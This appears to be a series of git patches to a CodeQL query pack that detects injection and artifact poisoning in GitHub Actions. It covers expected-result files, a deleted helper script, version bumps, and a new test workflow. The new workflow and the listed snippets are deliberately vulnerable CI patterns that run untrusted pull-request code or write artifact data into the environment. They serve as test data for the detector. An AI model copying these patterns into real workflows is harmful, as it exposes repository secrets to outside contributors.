injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 1ac092dd0d3..23bc7784f76 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -1,4 +1,9 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | 
.github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | 
@@ -25,6 +30,16 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| 
.github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 7aa170a2e98..7a59ab6ec60 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -11,9 +11,6 @@ edges | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes 
@@ -38,12 +35,6 @@ nodes | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | 
@@ -62,9 +53,6 @@ subpaths | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 8d946507799..2ed89bcb4bc 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -11,9 +11,6 @@ edges | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes 
@@ -38,12 +35,6 @@ nodes | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | From 7fa77e2728eead10408dbfa5d076e8f4b25ce8cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:05:00 +0200 Subject: [PATCH 0583/1267] Delete test script --- search_branches.py | 88 ---------------------------------------------- 1 file changed, 88 deletions(-) delete mode 100644 search_branches.py diff --git a/search_branches.py b/search_branches.py deleted file mode 100644 index d0036169fea..00000000000 
--- a/search_branches.py +++ /dev/null 
@@ -1,88 +0,0 @@ -import base64 -import os -import re -import sys -import time - -import requests - - -def handle_rate_limit(response, wait_time=60): - return False - - -def search_branches(repo_nwo, file_path, regex_pattern): - # GitHub API base URL - base_url = "https://api.github.com" - - # Get GitHub token from environment variable - github_token = os.environ.get("GITHUB_TOKEN") - if not github_token: - print("Error: GITHUB_TOKEN environment variable not set") - sys.exit(1) - - # Set up headers for authenticated requests - headers = { - "Authorization": f"token {github_token}", - "Accept": "application/vnd.github.v3+json", - } - - # Get all branches (with pagination) - branches_url = f"{base_url}/repos/{repo_nwo}/branches" - branches = [] - while branches_url: - branches_response = requests.get(branches_url, headers=headers) - if handle_rate_limit(branches_response): - continue - branches_response.raise_for_status() - branches.extend(branches_response.json()) - branches_url = branches_response.links.get("next", {}).get("url") - - # Compile the regex pattern - pattern = re.compile(regex_pattern) - - # Search file contents in each branch - for branch in branches: - branch_name = branch["name"] - file_url = f"{base_url}/repos/{repo_nwo}/contents/{file_path}?ref={branch_name}" - - while True: - file_response = requests.get(file_url, headers=headers) - - if file_response.status_code == 200: - file_content = file_response.json()["content"] - - decoded_content = base64.b64decode(file_content).decode("utf-8") - - if pattern.search(decoded_content): - print(f"Match found in branch: {branch_name}!!!!!") - else: - print(f"No match found in branch: {branch_name}") - break - elif file_response.status_code == 404: - print(f"File not found in branch: {branch_name}") - break - elif ( - file_response.status_code == 403 - and "X-RateLimit-Remaining" in file_response.headers - ): - if int(file_response.headers["X-RateLimit-Remaining"]) == 0: - reset_time = 
int(file_response.headers["X-RateLimit-Reset"]) - sleep_time = reset_time - int(time.time()) + 1 - print(f"Rate limit exceeded. Waiting for {sleep_time} seconds.") - time.sleep(sleep_time) - - -if __name__ == "__main__": - if len(sys.argv) != 4: - print("Usage: python search_branches.py ") - sys.exit(1) - - repo_nwo = sys.argv[1] - file_path = sys.argv[2] - regex_pattern = sys.argv[3] - - print( - f"Searching branches in {repo_nwo} for {file_path} with pattern {regex_pattern}" - ) - search_branches(repo_nwo, file_path, regex_pattern) From 3b95ae0b531c9555bb2318b8f54b556edcce132b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:15:58 +0200 Subject: [PATCH 0584/1267] Bump QLPacks versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 229b1f81c7b..82891e5c017 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.66 +version: 0.1.67 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e03e2a45cb7..fb4416ffb1d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.66 +version: 0.1.67 groups: [actions, queries] suites: codeql-suites extractor: javascript From ff17d1dcb1d243238644816e59faae13edd84290 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:50:11 +0200 Subject: [PATCH 0585/1267] Add CmdI test --- ql/src/Debug/partial.ql | 4 +- .../CWE-094/.github/workflows/test16.yml | 231 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 27 ++ .../CWE-094/CodeInjectionMedium.expected | 23 ++ 4 files changed, 284 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml 
diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql
index cb8ba7873d8..c1578220b6b 100644
--- a/ql/src/Debug/partial.ql
+++ b/ql/src/Debug/partial.ql
@@ -18,7 +18,9 @@ import PartialFlow::PartialPathGraph
 private module MyConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
 source instanceof RemoteFlowSource and
- source.getLocation().getFile().getBaseName() = "non-existant-test.yml"
+ //source.getLocation().getFile().getBaseName() = "non-existant-test.yml"
+ source.getLocation().getFile().getBaseName() = "test16.yml" and
+ source.getLocation().getStartLine() = 125
 }
 predicate isSink(DataFlow::Node sink) { none() }
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml
new file mode 100644
index 00000000000..0b3002506a1
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml
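Review bot: The previous filter is left behind as a commented-out line in `isSource` (`//source.getLocation().getFile().getBaseName() = "non-existant-test.yml"`), and the replacement pins this debug query to one fixture file and the literal start line `125`. Dead code should be removed rather than commented out, and the pinned location deserves a short comment such as `// debug only: restrict partial flow to the step under investigation`, because any later edit to test16.yml that shifts lines would presumably leave the query with no sources and no visible error. `MyConfig` continues past the end of the hunk.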
@@ -0,0 +1,231 @@ +name: 📤 Preview Deploy + +on: + workflow_run: + workflows: + - 🎬 Setup + types: + - completed + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + + outputs: + id: ${{ steps.pr.outputs.value }} + ref: ${{ steps.ref.outputs.value }} + repo: ${{ steps.repo.outputs.value }} + + steps: + # Get PR id from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-id + + - name: get PR id + id: pr + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR ref from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-ref + + - name: get PR ref + id: ref + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR repo from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-repo + + - name: get PR repo + id: repo + run: echo "value=$(> $GITHUB_OUTPUT + + prepare: + runs-on: ubuntu-latest + needs: [setup] + + steps: + # ================= Create Comment ================= + - name: 🧽 Find And Delete Comment + uses: peter-evans/find-comment@v2 + if: ${{ needs.setup.outputs.id != '' }} + id: fc + with: + issue-number: ${{ needs.setup.outputs.id }} + comment-author: 'github-actions[bot]' + body-includes: View Deployment + + - name: 📠Create or update comment + uses: peter-evans/create-or-update-comment@v3 + if: ${{ needs.setup.outputs.id != '' }} + with: + comment-id: ${{ steps.fc.outputs.comment-id }} + issue-number: ${{ needs.setup.outputs.id }} + body: | + ## View Deployment + + [#${{ github.run_id 
}}](https://github.com/dream-num/univer/actions/runs/${{ github.run_id }}) + +

+ 🥠🔠🥓 🥗 🥘 🌯 🚠🛠🖠🭠🧠ðŸ 🥪 🥖 ðŸª
+ Still cooking, please come back later
+ 🥙 🥮 🥨 🌭 🦠🙠🕠🰠🮠🜠🡠🱠🿠🕠🥟 +

+ edit-mode: replace + + build-demo: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-demo-dev.outputs.preview-url == '' && steps.vercel-demo.outputs.preview-url || steps.vercel-demo-dev.outputs.preview-url }} + commit-message: ${{ steps.commit-message.outputs.value }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + - name: Get commit message + id: commit-message + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + + # ================= Deploy Demo ================= + - name: 📦 Build demo + run: pnpm build:demo + + - name: Copy demo to workspace + run: | + mkdir .workspace + cp -r ./examples/local/* .workspace + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-demo + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ 